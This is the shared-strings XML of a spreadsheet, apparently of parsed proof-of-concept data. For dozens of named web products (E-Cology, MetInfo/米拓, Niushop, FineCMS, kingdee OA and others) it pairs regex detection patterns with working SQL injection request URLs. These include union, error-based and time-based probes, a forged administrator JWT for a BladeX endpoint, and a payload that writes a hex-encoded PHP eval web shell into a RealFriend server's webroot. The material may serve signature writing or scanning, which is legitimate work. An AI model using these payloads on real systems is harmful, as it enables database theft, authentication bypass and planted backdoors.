  <si>
    <t>.*?(?:/forummission\.php\?index=show\&amp;id=24%20and\+1=2\+union\+select\+1,2,md5\(1\),4,5,6,7,8,9,10,11\-\-).*</t>
  </si>
  <si>
    <t>/forummission.php?index=show&amp;id=24%20and+1=2+union+select+1,2,md5(1),4,5,6,7,8,9,10,11--</t>
  </si>
  <si>
    <t>.*?(?:/upload/plugin\.php\?id=nds_up_ques:nds_ques_viewanswer\&amp;srchtxt=1\&amp;orderby=dateline%20and%201=\(updatexml\(1,concat\(0x27,md5\(1\)\),1\)\)\-\-).*</t>
  </si>
  <si>
    <t>/upload/plugin.php?id=nds_up_ques:nds_ques_viewanswer&amp;srchtxt=1&amp;orderby=dateline%20and%201=(updatexml(1,concat(0x27,md5(1)),1))--</t>
  </si>
  <si>
    <t>‌DocCMS</t>
  </si>
  <si>
    <t>‌DocCMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/search/index\.php\?keyword=1%2527%2520%2561%256e%2564%2520%2528%2565%2578%2574%2572%2561%2563%2574%2576%2561%256c%2575%2565%2528%2531%252c%2563%256f%256e%2563%2561%2574%2528%2530%2578%2537%2565%252c%2528%2573%2565%256c%2565%2563%2574%2520%2575%2573%2565%2572%2528%2529%2529%252c%2530%2578%2537%2565%2529%2529%2529%2523).*</t>
  </si>
  <si>
    <t>/search/index.php?keyword=1%2527%2520%2561%256e%2564%2520%2528%2565%2578%2574%2572%2561%2563%2574%2576%2561%256c%2575%2565%2528%2531%252c%2563%256f%256e%2563%2561%2574%2528%2530%2578%2537%2565%252c%2528%2573%2565%256c%2565%2563%2574%2520%2575%2573%2565%2572%2528%2529%2529%252c%2530%2578%2537%2565%2529%2529%2529%2523</t>
  </si>
  <si>
    <t>.*?(?:/user/City_ajax\.aspx\?CityId=randomInt\(1,\ 100\)'union%20select%20sys\.fn_sqlvarbasetostr\(HashBytes\('MD5','randomInt\(800000000,\ 1000000000\)'\)\),2\-\-</t>
  </si>
  <si>
    <t>/user/City_ajax.aspx?CityId=randomInt(1, 100)'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','randomInt(800000000, 1000000000)')),2--|/user/City_ajax.aspx</t>
  </si>
  <si>
    <t>.*?(?:/duomiphp/ajax\.php\?action=addfav\&amp;id=1\&amp;uid=1%20and%20extractvalue\(1,concat_ws\(1,1,md5\(\{\{num\}\}\)\)\)).*</t>
  </si>
  <si>
    <t>.*?(?:/duomiphp/ajax\.php\?action=addfav\&amp;id=1\&amp;uid=1%20and%20extractvalue\(1,concat_ws\(1,1,md5\(2000000005\)\)\)).*</t>
  </si>
  <si>
    <t>/duomiphp/ajax.php?action=addfav&amp;id=1&amp;uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005)))</t>
  </si>
  <si>
    <t>泛微 E-Cology</t>
  </si>
  <si>
    <t>泛微 E-Cology_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/pweb/careerapply/HrmCareerApplyPerView\.jsp\?id=1%20union%20select%201,2,sys\.fn_sqlvarbasetostr\(HashBytes\(%27MD5%27,%27abc%27\)\),db_name\(1\),5,6,7).*</t>
  </si>
  <si>
    <t>/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27abc%27)),db_name(1),5,6,7</t>
  </si>
  <si>
    <t>.*?(?:/mobile/plugin/SyncUserInfo\.jsp\?userIdentifiers=\-1\)union\(select\(3\),null,null,null,null,null,str\(98989\*44313\),null).*</t>
  </si>
  <si>
    <t>.*?(?:/pweb/careerapply/HrmCareerApplyPerView\.jsp\?id=1\+union\+select\+1,2,sys\.fn_sqlvarbasetostr\(HashBytes\('MD5','abc'\)\),db_name\(1\),5,6,7|/js/hrm/getdata\.jsp\?cmd=getSelectAllId\&amp;sql=select\+547653\*865674\+as\+id).*</t>
  </si>
  <si>
    <t>/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1+union+select+1,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7|/js/hrm/getdata.jsp?cmd=getSelectAllId&amp;sql=select+547653*865674+as+id</t>
  </si>
  <si>
    <t>.*?(?:/weaver/weaver\.file\.FileDownloadForOutDoc|/general/system/seal_manage/dianju/delete_log\.php\?DELETE_STR=1\)\ and\ IF\(1=1,\ SLEEP\(5\),\ 0\)\ and\ \(1\)=\(1\)).*</t>
  </si>
  <si>
    <t>/weaver/weaver.file.FileDownloadForOutDoc|/general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1) and IF(1=1, SLEEP(5), 0) and (1)=(1)</t>
  </si>
  <si>
    <t>Erensoft</t>
  </si>
  <si>
    <t>Erensoft_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/videoseyret\.php\?id=95%20AND%20\(SELECT%204581%20FROM%20\(SELECT\(SLEEP\(6\)\)\)NyiX\)).*</t>
  </si>
  <si>
    <t>/videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX)</t>
  </si>
  <si>
    <t>Etouch系统</t>
  </si>
  <si>
    <t>Etouch系统_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/upload/mobile/index\.php\?c=category\&amp;a=asynclist\&amp;price_max=1\.0%20AND%20\(SELECT%201%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(0x7e,md5\(1\),0x7e,FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20INFORMATION_SCHEMA\.CHARACTER_SETS%20GROUP%20BY%20x\)a\)').*</t>
  </si>
  <si>
    <t>/upload/mobile/index.php?c=category&amp;a=asynclist&amp;price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'</t>
  </si>
  <si>
    <t>Eusestudy系统</t>
  </si>
  <si>
    <t>Eusestudy系统_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/Plan/plancommentlist\.aspx\?type=3and/\*\*/1=sys\.fn_varbintohexstr\(hashbytes\(%27MD5%27,%271234%27\)\)\-\-\&amp;targetid=1).*</t>
  </si>
  <si>
    <t>/Plan/plancommentlist.aspx?type=3and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--&amp;targetid=1</t>
  </si>
  <si>
    <t>Eyou</t>
  </si>
  <si>
    <t>Eyou_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/php/report/lastlogin_list_export\.php\?stime=a\&amp;time=0000\-00\-01%20union%20select%20@@hostname,0x7e7077,3%20%23).*</t>
  </si>
  <si>
    <t>/php/report/lastlogin_list_export.php?stime=a&amp;time=0000-00-01%20union%20select%20@@hostname,0x7e7077,3%20%23</t>
  </si>
  <si>
    <t>方维CMS</t>
  </si>
  <si>
    <t>方维CMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?m=Goods\&amp;a=showcate\&amp;id=103%20UNION%20ALL%20SELECT%20CONCAT%28\{\{veritify\}\}%29%23).*</t>
  </si>
  <si>
    <t>/index.php?m=Goods&amp;a=showcate&amp;id=103%20UNION%20ALL%20SELECT%20CONCAT%28{{veritify}}%29%23</t>
  </si>
  <si>
    <t>.*?(?:/taste/addTasteJsonp\?company=1\&amp;userName=1\&amp;jsonpcallback=1\&amp;mobile=1%27%20AND%20\(SELECT%208094%20FROM%20\(SELECT\(SLEEP\(3\)\)\)mKjk\)%20OR%20%27KQZm%27=%27REcX|/taste/addTasteJsonp\?company=1\&amp;userName=1\&amp;jsonpcallback=1\&amp;mobile=1%27%20AND%20\(SELECT%208094%20FROM%20\(SELECT\(SLEEP\(6\)\)\)mKjk\)%20OR%20%27KQZm%27=%27REcX).*</t>
  </si>
  <si>
    <t>/taste/addTasteJsonp?company=1&amp;userName=1&amp;jsonpcallback=1&amp;mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(3)))mKjk)%20OR%20%27KQZm%27=%27REcX|/taste/addTasteJsonp?company=1&amp;userName=1&amp;jsonpcallback=1&amp;mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(6)))mKjk)%20OR%20%27KQZm%27=%27REcX</t>
  </si>
  <si>
    <t xml:space="preserve">FineCMS </t>
  </si>
  <si>
    <t>FineCMS _SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?c=api\&amp;m=data2\&amp;auth=582f27d140497a9d8f048ca085b111df\&amp;param=action=sql%20sql=%27select%20md5\(\{\{num\}\}\)%27).*</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?c=api\&amp;m=data2\&amp;auth=582f27d140497a9d8f048ca085b111df\&amp;param=action=sql%20sql=%27select%20md5\(randomInt\(200000000,\ 210000000\)\)%27).*</t>
  </si>
  <si>
    <t>/index.php?c=api&amp;m=data2&amp;auth=582f27d140497a9d8f048ca085b111df&amp;param=action=sql%20sql=%27select%20md5(randomInt(200000000, 210000000))%27</t>
  </si>
  <si>
    <t>Fumasoft Cloud_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/Ajax/AjaxMethod\.ashx\?action=getEmpByname\&amp;Name=Y'\+union\+select\+substring\(sys\.fn_sqlvarbasetostr\(HASHBYTES\('MD5','\{\{num\}\}'\)\),3,32\)\-\-).*</t>
  </si>
  <si>
    <t>.*?(?:/w_selfservice/oauthservlet/%2e\./\.%2e/servlet/sduty/getSdutyTree\?param=child\&amp;target=1\&amp;codesetid=1\&amp;codeitemid=1%27\+UNION\+ALL\+SELECT\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\-\-\+Iprd).*</t>
  </si>
  <si>
    <t>.*?(?:/servlet/codesettree\?flag=c\&amp;status=1\&amp;codesetid=1\&amp;parentid=\-1\&amp;categories=\~31\~27\~20union\~20all\~20select\~20\~27hongjing\~27\~2c\~40\~40version\~2d\~2d).*</t>
  </si>
  <si>
    <t>JeeplusCMS</t>
  </si>
  <si>
    <t>JeeplusCMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/a/sys/user/resetPassword\?mobile=13588888888%27and%20\(updatexml\(1,concat\(0x7e,\(select%20md5\(\{\{num\}\}\)\),0x7e\),1\)\)%23).*</t>
  </si>
  <si>
    <t xml:space="preserve">kingdee OA </t>
  </si>
  <si>
    <t>kingdee OA _SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/kingdee/tree/tree/get_flow\.jsp\?ids=1\&amp;file_type=1\)%20union%20select%20NULL,sys\.fn_varbintohexstr\(hashbytes\(%27MD5%27,%20%271234%27\)\)\-\-).*</t>
  </si>
  <si>
    <t>/kingdee/tree/tree/get_flow.jsp?ids=1&amp;file_type=1)%20union%20select%20NULL,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%20%271234%27))--</t>
  </si>
  <si>
    <t>.*?(?:/SM/rpt_listreport_definefield\.aspx\?ID=2%20and%201=@@version\-\-\+).*</t>
  </si>
  <si>
    <t>mallbuilder商城</t>
  </si>
  <si>
    <t>mallbuilder商城_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/pay/api/change_status\.php\?id=1%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28SELECT%20md5%28123%29%20limit%200%2C1%29%29%2C0%29%20or%27).*</t>
  </si>
  <si>
    <t>/pay/api/change_status.php?id=1%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28SELECT%20md5%28123%29%20limit%200%2C1%29%29%2C0%29%20or%27</t>
  </si>
  <si>
    <t>maticsoft Shop</t>
  </si>
  <si>
    <t>maticsoft Shop_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/NodeProdCategory\.aspx\?action=GetChildNode\&amp;CategoryId=2%20AND%201=@@version).*</t>
  </si>
  <si>
    <t>/NodeProdCategory.aspx?action=GetChildNode&amp;CategoryId=2%20AND%201=@@version</t>
  </si>
  <si>
    <t>米拓_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/member/login\.php/aa'UNION\ SELECT\ \(select\ concat\(admin_id,0x23,md5\(5\)\)\ from\ met_admin_table\ limit\ 1\),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa).*</t>
  </si>
  <si>
    <t>/member/login.php/aa'UNION SELECT (select concat(admin_id,0x23,md5(5)) from met_admin_table limit 1),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa</t>
  </si>
  <si>
    <t>.*?(?:/job/job\.php\?lang=cn\&amp;id=1\&amp;settings\[met_column\]=met_admin_table%20where%201%20AND%20SLEEP\(5\)\-\-).*</t>
  </si>
  <si>
    <t>/job/job.php?lang=cn&amp;id=1&amp;settings[met_column]=met_admin_table%20where%201%20AND%20SLEEP(5)--</t>
  </si>
  <si>
    <t>.*?(?:/admin/login/login_check\.php\?met_cookie_filter\[a\]=a%27\+where\+\(select\+sleep\(5\)\)=1;\+%23\-\-).*</t>
  </si>
  <si>
    <t>/admin/login/login_check.php?met_cookie_filter[a]=a%27+where+(select+sleep(5))=1;+%23--</t>
  </si>
  <si>
    <t>.*?(?:/news\{\{news\}\}\&amp;serch_sql=as%20a%20join%20information_schema\.CHARACTER_SETS%20as%20b%20where%20if\(ascii\(substr\(b\.CHARACTER_SET_NAME,1,1\)\)&gt;255,1,0\)%20limit%201\-\-%20sd\&amp;imgproduct=xxxx|/news\{\{news\}\}\&amp;serch_sql=as%20a%20join%20information_schema\.CHARACTER_SETS%20as%20b%20where%20if\(ascii\(substr\(b\.CHARACTER_SET_NAME,1,1\)\)&gt;0,1,0\)%20limit%201\-\-%20sd\&amp;imgproduct=xxxx|/news/).*</t>
  </si>
  <si>
    <t>/news{{news}}&amp;serch_sql=as%20a%20join%20information_schema.CHARACTER_SETS%20as%20b%20where%20if(ascii(substr(b.CHARACTER_SET_NAME,1,1))&gt;255,1,0)%20limit%201--%20sd&amp;imgproduct=xxxx|/news{{news}}&amp;serch_sql=as%20a%20join%20information_schema.CHARACTER_SETS%20as%20b%20where%20if(ascii(substr(b.CHARACTER_SET_NAME,1,1))&gt;0,1,0)%20limit%201--%20sd&amp;imgproduct=xxxx|/news/</t>
  </si>
  <si>
    <t>.*?(?:/member/login\.php/aa'UNION%20SELECT%20\(md5\(123\)\),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa|/member/login\.php/aa'UNION%20SELECT%20concat\(0x7e7e7e,md5\(123\),0x7e7e7e\),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa).*</t>
  </si>
  <si>
    <t>/member/login.php/aa'UNION%20SELECT%20(md5(123)),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa|/member/login.php/aa'UNION%20SELECT%20concat(0x7e7e7e,md5(123),0x7e7e7e),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa</t>
  </si>
  <si>
    <t>.*?(?:/search/search\.php\?class1=2\&amp;class2=\&amp;class3=\&amp;searchtype=2\&amp;searchword=testvul\&amp;lang=cn\&amp;class1re=\)%20and%201=1\-\-%20sd|/search/search\.php\?class1=2\&amp;class2=\&amp;class3=\&amp;searchtype=2\&amp;searchword=testvul\&amp;lang=cn\&amp;class1re=\)%20and%201=2\-\-%20sd).*</t>
  </si>
  <si>
    <t>/search/search.php?class1=2&amp;class2=&amp;class3=&amp;searchtype=2&amp;searchword=testvul&amp;lang=cn&amp;class1re=)%20and%201=1--%20sd|/search/search.php?class1=2&amp;class2=&amp;class3=&amp;searchtype=2&amp;searchword=testvul&amp;lang=cn&amp;class1re=)%20and%201=2--%20sd</t>
  </si>
  <si>
    <t>米拓_SQL注入_CVE-2019-16996</t>
  </si>
  <si>
    <t>.*?(?:/admin/\?n=product\&amp;c=product_admin\&amp;a=dopara\&amp;app_type=shop\&amp;id=1%20union%20SELECT%201,2,3,randomInt\(40000,\ 44800\)\*randomInt\(40000,\ 44800\),5,6,7%20limit%205,1%20%23).*</t>
  </si>
  <si>
    <t>/admin/?n=product&amp;c=product_admin&amp;a=dopara&amp;app_type=shop&amp;id=1%20union%20SELECT%201,2,3,randomInt(40000, 44800)*randomInt(40000, 44800),5,6,7%20limit%205,1%20%23</t>
  </si>
  <si>
    <t>米拓_SQL注入_CVE-2019-17418</t>
  </si>
  <si>
    <t>.*?(?:/admin/\?n=language\&amp;c=language_general\&amp;a=doSearchParameter\&amp;editor=cn\&amp;word=search\&amp;appno=0\+union\+select\+randomInt\(40000,\ 44800\)\*randomInt\(40000,\ 44800\),1\-\-\+\&amp;site=admin).*</t>
  </si>
  <si>
    <t>/admin/?n=language&amp;c=language_general&amp;a=doSearchParameter&amp;editor=cn&amp;word=search&amp;appno=0+union+select+randomInt(40000, 44800)*randomInt(40000, 44800),1--+&amp;site=admin</t>
  </si>
  <si>
    <t>Netoray上网行为管理系统</t>
  </si>
  <si>
    <t>Netoray上网行为管理系统_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/bottomframe\.CGI\?user_name='\)\)%20union%20select%20md5\(1\)%23where%20name%3d'superadmin'%23).*</t>
  </si>
  <si>
    <t>/bottomframe.CGI?user_name='))%20union%20select%20md5(1)%23where%20name%3d'superadmin'%23</t>
  </si>
  <si>
    <t>Niushop电子商城系统</t>
  </si>
  <si>
    <t>Niushop电子商城系统_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/wap/goods/getGoodsListByConditions\?category_id=1\&amp;brand_id=2\&amp;min_price=3\&amp;max_price=4\&amp;page=5\&amp;page_size=6\&amp;order=7\&amp;attr_array\[\]\[2\]=8%27\)%20AND%20\(SELECT%208036%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(0x7176766b71,\(SELECT%20\(ELT\(8036=8036,1\)\)\),0x7171786a71,FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20INFORMATION_SCHEMA\.CHARACTER_SETS%20GROUP%20BY%20x\)a\)%20AND%20\(%27uRUI%27=%27uRUI\&amp;spec_array\[\]=9).*</t>
  </si>
  <si>
    <t>/index.php/wap/goods/getGoodsListByConditions?category_id=1&amp;brand_id=2&amp;min_price=3&amp;max_price=4&amp;page=5&amp;page_size=6&amp;order=7&amp;attr_array[][2]=8%27)%20AND%20(SELECT%208036%20FROM(SELECT%20COUNT(*),CONCAT(0x7176766b71,(SELECT%20(ELT(8036=8036,1))),0x7171786a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20(%27uRUI%27=%27uRUI&amp;spec_array[]=9</t>
  </si>
  <si>
    <t>‌泛微 E-Cology</t>
  </si>
  <si>
    <t>‌泛微 E-Cology_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/upgrade/detail\.jsp/login/LoginSSO\.jsp\?id=1%20UNION%20SELECT%20md5\(\{\{num\}\}\)%20as%20id%20from%20HrmResourceManager).*</t>
  </si>
  <si>
    <t>/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/Index\?ext_price%3D1\)/\*\*/and/\*\*/1%3C%3E2/\*\*/union/\*\*/select/\*\*/1,2,3,4,hex\(123456789\),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3\-\-/\*\*/).*</t>
  </si>
  <si>
    <t>/index.php/Index?ext_price%3D1)/**/and/**/1%3C%3E2/**/union/**/select/**/1,2,3,4,hex(123456789),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3--/**/</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/Search/index\?keyword=aaaa\&amp;updatexml\(1,concat\(0x7e,\(SELECT/\*\*/md5\(123\)/\*\*/limit/\*\*/0,1\),0x7e\),1\)\);%23=123).*</t>
  </si>
  <si>
    <t>/index.php/Search/index?keyword=aaaa&amp;updatexml(1,concat(0x7e,(SELECT/**/md5(123)/**/limit/**/0,1),0x7e),1));%23=123</t>
  </si>
  <si>
    <t>.*?(?:/search\?1%3D1\)and\(updatexml\(1,concat\(0x7e,\(SELECT/\*\*/md5\(123\)\),0x7e\),1\)\)\-\-=1).*</t>
  </si>
  <si>
    <t>/search?1%3D1)and(updatexml(1,concat(0x7e,(SELECT/**/md5(123)),0x7e),1))--=1</t>
  </si>
  <si>
    <t>PHP_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/arcade\.php\?act=Arcade\&amp;do=stats\&amp;comment=a\&amp;s_id=1').*</t>
  </si>
  <si>
    <t>.*?(?:/api\.php\?c=project\&amp;f=index\&amp;token=1234\&amp;id=news\&amp;sort=1\ and\ extractvalue\(1,concat\(0x7e,md5\(\{\{num\}\}\)\)\)\ \-\-\+).*</t>
  </si>
  <si>
    <t>.*?(?:/api\.php\?c=project\&amp;f=index\&amp;token=1234\&amp;id=news\&amp;sort=1\ and\ extractvalue\(1,concat\(0x7e,md5\(randomInt\(800000000,\ 1000000000\)\)\)\)\ \-\-\+).*</t>
  </si>
  <si>
    <t>/api.php?c=project&amp;f=index&amp;token=1234&amp;id=news&amp;sort=1 and extractvalue(1,concat(0x7e,md5(randomInt(800000000, 1000000000)))) --+</t>
  </si>
  <si>
    <t>.*?(?:/include/plugin/payment/alipay/pay\.php\?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28md5\(randomInt\(200000000,\ 210000000\)\)%29,4,5,6,7,8,9,10,11,12%23_).*</t>
  </si>
  <si>
    <t>/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28md5(randomInt(200000000, 210000000))%29,4,5,6,7,8,9,10,11,12%23_</t>
  </si>
  <si>
    <t>.*?(?:/Api/portal/elementEcodeAddon/getSqlData\?sql=Select%20\*%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27).*</t>
  </si>
  <si>
    <t>/Api/portal/elementEcodeAddon/getSqlData?sql=Select%20*%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27</t>
  </si>
  <si>
    <t>.*?(?:/AgentBoard\.XGI\?user=\-1%27\+union\+select\+0x7161786e62%2C0x3c3f70687020636c617373204739413674353551207b207075626c69632066756e6374696f6e205f5f636f6e73747275637428244873743857297b20406576616c28222f2a5a384f313336656170632a2f222e2448737438572e2222293b207d7d6e657720473941367435355128245f524551554553545b277161786e62275d293b3f3e\+into\+outfile\+%22C%3A%5C%5CProgram%5C\+Files%5C\+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C\+Server%5C%5CWebRoot%5C%5Cqax\.php%22\+\-\-\+\-\&amp;cmd=UserLogin).*</t>
  </si>
  <si>
    <t>/AgentBoard.XGI?user=-1%27+union+select+0x7161786e62%2C0x3c3f70687020636c617373204739413674353551207b207075626c69632066756e6374696f6e205f5f636f6e73747275637428244873743857297b20406576616c28222f2a5a384f313336656170632a2f222e2448737438572e2222293b207d7d6e657720473941367435355128245f524551554553545b277161786e62275d293b3f3e+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5Cqax.php%22+--+-&amp;cmd=UserLogin</t>
  </si>
  <si>
    <t>.*?(?:/comment/api/index\.php\?gid=1\&amp;page=2\&amp;rlist\[\]=@`%27`,%20extractvalue\(1,%20concat_ws\(0x20,%200x5c,\(select%20md5\(\{\{num\}\}\)\)\)\),@`%27`).*</t>
  </si>
  <si>
    <t>seagate多媒体服务器</t>
  </si>
  <si>
    <t>seagate多媒体服务器_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/folderViewAllFiles\.psp\?start=0\&amp;count=60\&amp;url=%2F\&amp;dirId=\\%27\+union\+select\+null,name,null,sql,null,null\+from\+sqlite_master\+\-\-\+).*</t>
  </si>
  <si>
    <t>/folderViewAllFiles.psp?start=0&amp;count=60&amp;url=%2F&amp;dirId=\%27+union+select+null,name,null,sql,null,null+from+sqlite_master+--+</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/ext/trafaxserver/ExtnoManage/setextno\.jsp\?user_ids=\(99999\)\+union\+all\+select\+1,2,\(md5\(\{\{num\}\}\)\),4\#).*</t>
  </si>
  <si>
    <t>狮子鱼 CMS ApiController</t>
  </si>
  <si>
    <t>狮子鱼 CMS ApiController_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=api/goods_detail\&amp;goods_id=1%20and%20updatexml\(1,concat\(0x7e,md5\(\{\{num\}\}\),0x7e\),1\)).*</t>
  </si>
  <si>
    <t>api_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Spring_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/api/blade\-user/export\-user\?Blade\-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9\.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9\.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH\-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ\&amp;account=\&amp;realName=\&amp;1\-updatexml\(1,concat\(0x7e,md5\(102103122\),0x7e\),1\)=1).*</t>
  </si>
  <si>
    <t>/api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&amp;account=&amp;realName=&amp;1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1</t>
  </si>
  <si>
    <t>.*?(?:/api/blade\-log/error/list\?updatexml\(1,concat\(0x7e,md5\(1\),0x7e\),1\)=1).*</t>
  </si>
  <si>
    <t>/api/blade-log/error/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1</t>
  </si>
  <si>
    <t>synotec Holdings</t>
  </si>
  <si>
    <t>synotec Holdings_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/view\-room\.php\?id=1%20/\*!12345and\*/%20updatexml\(1,concat_ws\(%27%27,0x7e,\(select%20md5\(1\)\)\),3\)\-\-\+|/view\-package\.php\?id=1%20/\*!12345and\*/%20updatexml\(1,concat_ws\(%27%27,0x7e,\(select%20md5\(1\)\)\),3\)\-\-\+|/view\-accommodations\.php\?id=1%20/\*!12345and\*/%20updatexml\(1,concat_ws\(%27%27,0x7e,\(select%20md5\(1\)\)\),3\)\-\-\+|/view\-day\-tour\.php\?id=1%20/\*!12345and\*/%20updatexml\(1,concat_ws\(%27%27,0x7e,\(select%20md5\(1\)\)\),3\)\-\-\+|/view\-accommodation\.php\?id=1%20/\*!12345and\*/%20updatexml\(1,concat_ws\(%27%27,0x7e,\(select%20md5\(1\)\)\),3\)\-\-\+).*</t>
  </si>
  <si>
    <t>/view-room.php?id=1%20/*!12345and*/%20updatexml(1,concat_ws(%27%27,0x7e,(select%20md5(1))),3)--+|/view-package.php?id=1%20/*!12345and*/%20updatexml(1,concat_ws(%27%27,0x7e,(select%20md5(1))),3)--+|/view-accommodations.php?id=1%20/*!12345and*/%20updatexml(1,concat_ws(%27%27,0x7e,(select%20md5(1))),3)--+|/view-day-tour.php?id=1%20/*!12345and*/%20updatexml(1,concat_ws(%27%27,0x7e,(select%20md5(1))),3)--+|/view-accommodation.php?id=1%20/*!12345and*/%20updatexml(1,concat_ws(%27%27,0x7e,(select%20md5(1))),3)--+</t>
  </si>
  <si>
    <t>.*?(?:/general/system/seal_manage/dianju/delete_log\.php\?DELETE_STR=1\)\ and\ IF\(1=1,\ SLEEP\(5\),\ 0\)\ and\ \(1\)=\(1\)).*</t>
